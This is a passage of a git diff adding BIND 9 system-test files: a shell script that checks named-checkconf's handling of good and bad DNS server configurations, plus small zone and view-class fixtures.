0000000..5dcdd1b --- /dev/null +++ b/bin/tests/system/checkconf/shared.example.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 0 0 0 0 0 +@ 0 NS . diff --git a/bin/tests/system/checkconf/tests.sh b/bin/tests/system/checkconf/tests.sh new file mode 100644 index 0000000..c978efe --- /dev/null +++ b/bin/tests/system/checkconf/tests.sh @@ -0,0 +1,643 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +mkdir keys + +n=`expr $n + 1` +echo_i "checking that named-checkconf handles a known good config ($n)" +ret=0 +$CHECKCONF good.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf prints a known good config ($n)" +ret=0 +awk 'BEGIN { ok = 0; } /cut here/ { ok = 1; getline } ok == 1 { print }' good.conf > good.conf.in +[ -s good.conf.in ] || ret=1 +$CHECKCONF -p good.conf.in > checkconf.out$n || ret=1 +grep -v '^good.conf.in:' < checkconf.out$n > good.conf.out 2>&1 || ret=1 +cmp good.conf.in good.conf.out || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -x removes secrets ($n)" +ret=0 +# ensure there is a secret and that it is not the check string. +grep 'secret "' good.conf.in > /dev/null || ret=1 +grep 'secret "????????????????"' good.conf.in > /dev/null 2>&1 && ret=1 +$CHECKCONF -p -x good.conf.in > checkconf.out$n || ret=1 +grep -v '^good.conf.in:' < checkconf.out$n > good.conf.out 2>&1 || ret=1 +grep 'secret "????????????????"' good.conf.out > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +for bad in bad-*.conf +do + n=`expr $n + 1` + echo_i "checking that named-checkconf detects error in $bad ($n)" + ret=0 + $CHECKCONF $bad > checkconf.out$n 2>&1 + if [ $? -ne 1 ]; then ret=1; fi + grep "^$bad:[0-9]*: " < checkconf.out$n > /dev/null || ret=1 + case $bad in + bad-update-policy[123].conf) + pat="identity and name fields are not the same" + grep "$pat" < checkconf.out$n > /dev/null || ret=1 + ;; + bad-update-policy[4589].conf|bad-update-policy1[01].conf) + pat="name field not set to placeholder value" + grep "$pat" < checkconf.out$n > /dev/null || ret=1 + ;; + bad-update-policy[67].conf|bad-update-policy1[2345].conf) + pat="missing name field type '.*' found" + grep "$pat" < checkconf.out$n > /dev/null || ret=1 + ;; + esac + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for good in good-*.conf +do + n=`expr $n + 1` + echo_i "checking that named-checkconf detects no error in $good ($n)" + ret=0 + $CHECKCONF $good > checkconf.out$n 2>&1 + if [ $? -ne 0 ]; then echo_i "failed"; ret=1; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "checking that ancient options report a fatal error ($n)" +ret=0 +$CHECKCONF ancient.conf > ancient.out 2>&1 && ret=1 +grep "no longer exists" ancient.out > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z catches missing hint file ($n)" +ret=0 +$CHECKCONF -z hint-nofile.conf > hint-nofile.out 2>&1 && ret=1 +grep "could not configure root hints from 'nonexistent.db': file not found" hint-nofile.out > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf catches range errors ($n)" +ret=0 +$CHECKCONF range.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf warns of notify inconsistencies ($n)" +ret=0 +$CHECKCONF notify.conf > checkconf.out$n 2>&1 +warnings=`grep "'notify' is disabled" < checkconf.out$n | wc -l` +[ $warnings -eq 3 ] || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf dnssec warnings ($n)" +ret=0 +# dnssec.1: dnssec-enable is obsolete +$CHECKCONF dnssec.1 > checkconf.out$n.1 2>&1 +grep "'dnssec-enable' is obsolete and should be removed" < checkconf.out$n.1 > /dev/null || ret=1 +# dnssec.2: auto-dnssec warning +$CHECKCONF dnssec.2 > checkconf.out$n.2 2>&1 +grep 'auto-dnssec may only be ' < checkconf.out$n.2 > /dev/null || ret=1 +# dnssec.3: should have no warnings (other than deprecation warning) +$CHECKCONF dnssec.3 > checkconf.out$n.3 2>&1 +grep "option 'auto-dnssec' is deprecated" < checkconf.out$n.3 > /dev/null || ret=1 +lines=$(wc -l < "checkconf.out$n.3") +if [ $lines != 1 ]; then ret=1; fi +# dnssec.4: should have specific deprecation warning +$CHECKCONF dnssec.4 > checkconf.out$n.4 2>&1 +grep "'auto-dnssec' option is deprecated and will be removed in BIND 9\.19" < checkconf.out$n.4 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf deprecate warnings ($n)" +ret=0 +$CHECKCONF deprecated.conf > checkconf.out$n.1 2>&1 +grep "option 'managed-keys' is deprecated" < checkconf.out$n.1 > /dev/null || ret=1 +grep "option 'trusted-keys' is deprecated" < checkconf.out$n.1 > /dev/null || ret=1 +grep "option 'dscp' is deprecated" < checkconf.out$n.1 > /dev/null || ret=1 +grep "token 'dscp' is deprecated" < checkconf.out$n.1 > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +# set -i to ignore deprecate warnings +$CHECKCONF -i deprecated.conf > checkconf.out$n.2 2>&1 +grep '.*' < checkconf.out$n.2 > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf servestale warnings ($n)" +ret=0 +$CHECKCONF servestale.stale-refresh-time.0.conf > checkconf.out$n.1 2>&1 +grep "'stale-refresh-time' should either be 0 or otherwise 30 seconds or higher" < checkconf.out$n.1 > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +ret=0 +$CHECKCONF servestale.stale-refresh-time.29.conf > checkconf.out$n.1 2>&1 +grep "'stale-refresh-time' should either be 0 or otherwise 30 seconds or higher" < checkconf.out$n.1 > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "range checking fields that do not allow zero ($n)" +ret=0 +for field in max-retry-time min-retry-time max-refresh-time min-refresh-time; do + cat > badzero.conf << EOF +options { + $field 0; +}; +EOF + $CHECKCONF badzero.conf > checkconf.out$n.1 2>&1 + [ $? -eq 1 ] || { echo_i "options $field failed" ; ret=1; } + cat > badzero.conf << EOF +view dummy { + $field 0; +}; +EOF + $CHECKCONF badzero.conf > checkconf.out$n.2 2>&1 + [ $? -eq 1 ] || { echo_i "view $field failed" ; ret=1; } + cat > badzero.conf << EOF +options { + $field 0; +}; +view dummy { +}; +EOF + $CHECKCONF badzero.conf > checkconf.out$n.3 2>&1 + [ $? -eq 1 ] || { echo_i "options + view $field failed" ; ret=1; } + cat > badzero.conf << EOF +zone dummy { + type secondary; + primaries { 0.0.0.0; }; + $field 0; +}; +EOF + $CHECKCONF badzero.conf > checkconf.out$n.4 2>&1 + [ $? -eq 1 ] || { echo_i "zone $field failed" ; ret=1; } +done +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking options allowed in inline-signing secondaries ($n)" +ret=0 +$CHECKCONF bad-dnssec.conf > checkconf.out$n.1 2>&1 +l=`grep "dnssec-dnskey-kskonly.*requires inline" < checkconf.out$n.1 | wc -l` +[ $l -eq 1 ] || ret=1 +$CHECKCONF bad-dnssec.conf > checkconf.out$n.2 2>&1 +l=`grep "dnssec-loadkeys-interval.*requires inline" < checkconf.out$n.2 | wc -l` +[ $l -eq 1 ] || ret=1 +$CHECKCONF bad-dnssec.conf > checkconf.out$n.3 2>&1 +l=`grep "update-check-ksk.*requires inline" < checkconf.out$n.3 | wc -l` +[ $l -eq 1 ] || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check file + inline-signing for secondary zones ($n)" +$CHECKCONF inline-no.conf > checkconf.out$n.1 2>&1 +l=`grep "missing 'file' entry" < checkconf.out$n.1 | wc -l` +[ $l -eq 0 ] || ret=1 +$CHECKCONF inline-good.conf > checkconf.out$n.2 2>&1 +l=`grep "missing 'file' entry" < checkconf.out$n.2 | wc -l` +[ $l -eq 0 ] || ret=1 +$CHECKCONF inline-bad.conf > checkconf.out$n.3 2>&1 +l=`grep "missing 'file' entry" < checkconf.out$n.3 | wc -l` +[ $l -eq 1 ] || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf DLZ warnings ($n)" +ret=0 +$CHECKCONF dlz-bad.conf > checkconf.out$n 2>&1 +grep "'dlz' and 'database'" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking for missing key directory warning ($n)" +ret=0 +rm -rf test.keydir +$CHECKCONF warn-keydir.conf > checkconf.out$n.1 2>&1 +l=`grep "'test.keydir' does not exist" < checkconf.out$n.1 | wc -l` +[ $l -eq 1 ] || ret=1 +touch test.keydir +$CHECKCONF warn-keydir.conf > checkconf.out$n.2 2>&1 +l=`grep "'test.keydir' is not a directory" < checkconf.out$n.2 | wc -l` +[ $l -eq 1 ] || ret=1 +rm -f test.keydir +mkdir test.keydir +$CHECKCONF warn-keydir.conf > checkconf.out$n.3 2>&1 +l=`grep "key-directory" < checkconf.out$n.3 | wc -l` +[ $l -eq 0 ] || ret=1 +rm -rf test.keydir +if [ $ret -ne 0 ]; then echo_i "failed"; fi + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z catches conflicting ttl with max-ttl ($n)" +ret=0 +$CHECKCONF -z max-ttl.conf > check.out 2>&1 +grep 'TTL 900 exceeds configured max-zone-ttl 600' check.out > /dev/null 2>&1 || ret=1 +grep 'TTL 900 exceeds configured max-zone-ttl 600' check.out > /dev/null 2>&1 || ret=1 +grep 'TTL 900 exceeds configured max-zone-ttl 600' check.out > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z catches invalid max-ttl ($n)" +ret=0 +$CHECKCONF -z max-ttl-bad.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z skips zone check with alternate databases ($n)" +ret=0 +$CHECKCONF -z altdb.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z skips zone check with DLZ ($n)" +ret=0 +$CHECKCONF -z altdlz.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z fails on view with ANY class ($n)" +ret=0 +$CHECKCONF -z view-class-any1.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z fails on view with CLASS255 class ($n)" +ret=0 +$CHECKCONF -z view-class-any2.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z passes on view with IN class ($n)" +ret=0 +$CHECKCONF -z view-class-in1.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf -z passes on view with CLASS1 class ($n)" +ret=0 +$CHECKCONF -z view-class-in2.conf > checkconf.out$n 2>&1 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-names fails as configured ($n)" +ret=0 +$CHECKCONF -z check-names-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "near '_underscore': bad name (check-names)" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-names/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-mx fails as configured ($n)" +ret=0 +$CHECKCONF -z check-mx-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "near '10.0.0.1': MX is an address" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-mx/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-dup-records fails as configured ($n)" +ret=0 +$CHECKCONF -z check-dup-records-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "has semantically identical records" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-dup-records/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-mx fails as configured ($n)" +ret=0 +$CHECKCONF -z check-mx-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "failed: MX is an address" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-mx/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-mx-cname fails as configured ($n)" +ret=0 +$CHECKCONF -z check-mx-cname-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "MX.* is a CNAME (illegal)" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-mx-cname/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that check-srv-cname fails as configured ($n)" +ret=0 +$CHECKCONF -z check-srv-cname-fail.conf > checkconf.out$n 2>&1 && ret=1 +grep "SRV.* is a CNAME (illegal)" < checkconf.out$n > /dev/null || ret=1 +grep "zone check-mx-cname/IN: loaded serial" < checkconf.out$n > /dev/null && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf -p properly print a port range ($n)" +ret=0 +$CHECKCONF -p portrange-good.conf > checkconf.out$n 2>&1 || ret=1 +grep "range 8610 8614;" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf -z handles in-view ($n)" +ret=0 +$CHECKCONF -z in-view-good.conf > checkconf.out$n 2>&1 || ret=1 +grep "zone shared.example/IN: loaded serial" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf -z returns error when a later view is okay ($n)" +ret=0 +$CHECKCONF -z check-missing-zone.conf > checkconf.out$n 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf prints max-cache-size <percentage> correctly ($n)" +ret=0 +$CHECKCONF -p max-cache-size-good.conf > checkconf.out$n 2>&1 || ret=1 +grep "max-cache-size 60%;" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that named-checkconf -l prints out the zone list ($n)" +ret=0 +$CHECKCONF -l good.conf | +grep -v "is deprecated" | +grep -v "is not implemented" | +grep -v "is not recommended" | +grep -v "no longer exists" | +grep -v "is obsolete" > checkconf.out$n || ret=1 +diff good.zonelist checkconf.out$n > diff.out$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that 'dnssec-lookaside auto;' generates a warning ($n)" +ret=0 +$CHECKCONF warn-dlv-auto.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "option 'dnssec-lookaside' is obsolete and should be removed" < checkconf.out$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that 'dnssec-lookaside . trust-anchor dlv.isc.org;' generates a warning ($n)" +ret=0 +$CHECKCONF warn-dlv-dlv.isc.org.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "option 'dnssec-lookaside' is obsolete and should be removed" < checkconf.out$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that 'dnssec-lookaside . trust-anchor dlv.example.com;' generates a warning ($n)" +ret=0 +$CHECKCONF warn-dlv-dlv.example.com.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "option 'dnssec-lookaside' is obsolete and should be removed" < checkconf.out$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that the 2010 ICANN ROOT KSK without the 2017 ICANN ROOT KSK generates a warning ($n)" +ret=0 +$CHECKCONF check-root-ksk-2010.conf > checkconf.out$n 2>/dev/null || ret=1 +[ -s checkconf.out$n ] || ret=1 +grep "key without the updated" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that the 2010 ICANN ROOT KSK with the 2017 ICANN ROOT KSK does not generate a warning ($n)" +ret=0 +$CHECKCONF check-root-ksk-both.conf > checkconf.out$n 2>/dev/null || ret=1 +[ -s checkconf.out$n ] && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that the 2017 ICANN ROOT KSK alone does not generate a warning ($n)" +ret=0 +$CHECKCONF check-root-ksk-2017.conf > checkconf.out$n 2>/dev/null || ret=1 +[ -s checkconf.out$n ] && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that a static root key generates a warning ($n)" +ret=0 +$CHECKCONF check-root-static-key.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "static entry for the root zone WILL FAIL" checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that a static root DS trust anchor generates a warning ($n)" +ret=0 +$CHECKCONF check-root-static-ds.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "static entry for the root zone WILL FAIL" checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that a trusted-keys entry for root generates a warning ($n)" +ret=0 +$CHECKCONF check-root-trusted-key.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "trusted-keys entry for the root zone WILL FAIL" checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that using trust-anchors and managed-keys generates an error ($n)" +ret=0 +$CHECKCONF check-mixed-keys.conf > checkconf.out$n 2>/dev/null && ret=1 +grep "use of managed-keys is not allowed" checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that 'geoip-use-ecs no' generates a warning ($n)" +ret=0 +$CHECKCONF warn-geoip-use-ecs.conf > checkconf.out$n 2>/dev/null || ret=1 +[ -s checkconf.out$n ] || ret=1 +grep "'geoip-use-ecs' is obsolete" < checkconf.out$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf kasp errors ($n)" +ret=0 +$CHECKCONF kasp-and-other-dnssec-options.conf > checkconf.out$n 2>&1 && ret=1 +grep "'inline-signing yes;' must also be configured explicitly for zones using dnssec-policy without a configured 'allow-update' or 'update-policy'" < checkconf.out$n > /dev/null || ret=1 +grep "'auto-dnssec maintain;' cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1 +grep "dnskey-sig-validity: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1 +grep "dnssec-dnskey-kskonly: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1 +grep "dnssec-secure-to-insecure: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1 +grep "dnssec-update-mode: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1 +grep "sig-validity-interval: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1 +grep "update-check-ksk: cannot be configured if dnssec-policy is also set" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf kasp nsec3 iterations errors ($n)" +ret=0 +$CHECKCONF kasp-bad-nsec3-iter.conf > checkconf.out$n 2>&1 && ret=1 +grep "dnssec-policy: nsec3 iterations value 151 out of range" < checkconf.out$n > /dev/null || ret=1 +lines=$(wc -l < "checkconf.out$n") +if [ $lines -ne 3 ]; then ret=1; fi +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf kasp nsec3 algorithm errors ($n)" +ret=0 +$CHECKCONF kasp-bad-nsec3-alg.conf > checkconf.out$n 2>&1 && ret=1 +grep "dnssec-policy: cannot use nsec3 with algorithm 'RSASHA1'" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf kasp key errors ($n)" +ret=0 +$CHECKCONF kasp-bad-keylen.conf > checkconf.out$n 2>&1 && ret=1 +grep "dnssec-policy: key with algorithm rsasha1 has invalid key length 511" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking named-checkconf kasp predefined key length ($n)" +ret=0 +$CHECKCONF kasp-ignore-keylen.conf > checkconf.out$n 2>&1 || ret=1 +grep "dnssec-policy: key algorithm ecdsa256 has predefined length; ignoring length value 2048" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that a good 'kasp' configuration is accepted ($n)" +ret=0 +$CHECKCONF good-kasp.conf > checkconf.out$n 2>/dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that named-checkconf prints a known good kasp config ($n)" +ret=0 +awk 'BEGIN { ok = 0; } /cut here/ { ok = 1; getline } ok == 1 { print }' good-kasp.conf > good-kasp.conf.in +[ -s good-kasp.conf.in ] || ret=1 +$CHECKCONF -p good-kasp.conf.in | grep -v '^good-kasp.conf.in:' > good-kasp.conf.out 2>&1 || ret=1 +cmp good-kasp.conf.in good-kasp.conf.out || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that max-ixfr-ratio 100% generates a warning ($n)" +ret=0 +$CHECKCONF warn-maxratio1.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "exceeds 100%" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that *-source options with specified port generate warnings ($n)" +ret=0 +$CHECKCONF warn-transfer-source.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "not recommended" < checkconf.out$n > /dev/null || ret=1 +$CHECKCONF warn-notify-source.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "not recommended" < checkconf.out$n > /dev/null || ret=1 +$CHECKCONF warn-parental-source.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "not recommended" < checkconf.out$n > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that using both max-zone-ttl and dnssec-policy generates a warning ($n)" +ret=0 +$CHECKCONF warn-kasp-max-zone-ttl.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "option 'max-zone-ttl' is ignored when used together with 'dnssec-policy'" < checkconf.out$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check that masterfile-format map generates deprecation warning ($n)" +ret=0 +$CHECKCONF deprecated-masterfile-format-map.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "is deprecated" < checkconf.out$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that masterfile-format text and raw don't generate deprecation warning ($n)" +ret=0 +$CHECKCONF good-masterfile-format-text.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "is deprecated" < checkconf.out$n >/dev/null && ret=1 +$CHECKCONF good-masterfile-format-raw.conf > checkconf.out$n 2>/dev/null || ret=1 +grep "is deprecated" < checkconf.out$n >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that 'check-wildcard no;' succeeds as configured ($n)" +ret=0 +$CHECKCONF -z check-wildcard-no.conf > checkconf.out$n 2>&1 || ret=1 +grep -F "warning: ownername 'foo.*.check-wildcard' contains an non-terminal wildcard" checkconf.out$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check that 'check-wildcard yes;' warns as configured ($n)" +ret=0 +$CHECKCONF -z check-wildcard.conf > checkconf.out$n 2>&1 || ret=1 +grep -F "warning: ownername 'foo.*.check-wildcard' contains an non-terminal wildcard" checkconf.out$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; ret=1; fi +status=`expr $status + $ret` + +rmdir keys + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/checkconf/view-class-any1.conf b/bin/tests/system/checkconf/view-class-any1.conf new file mode 100644 index 0000000..8b39456 --- /dev/null +++ b/bin/tests/system/checkconf/view-class-any1.conf @@ -0,0 +1,14 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "example" any { }; diff --git a/bin/tests/system/checkconf/view-class-any2.conf b/bin/tests/system/checkconf/view-class-any2.conf new file mode 100644 index 0000000..049ccf6 --- /dev/null +++ b/bin/tests/system/checkconf/view-class-any2.conf @@ -0,0 +1,14 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view "example" class255 { }; diff --git a/bin/tests/system/checkconf/view-class-in1.conf b/bin/tests/system/checkconf/view-class-in1.conf new file mode 100644 index 0000000..1d203e6 --- 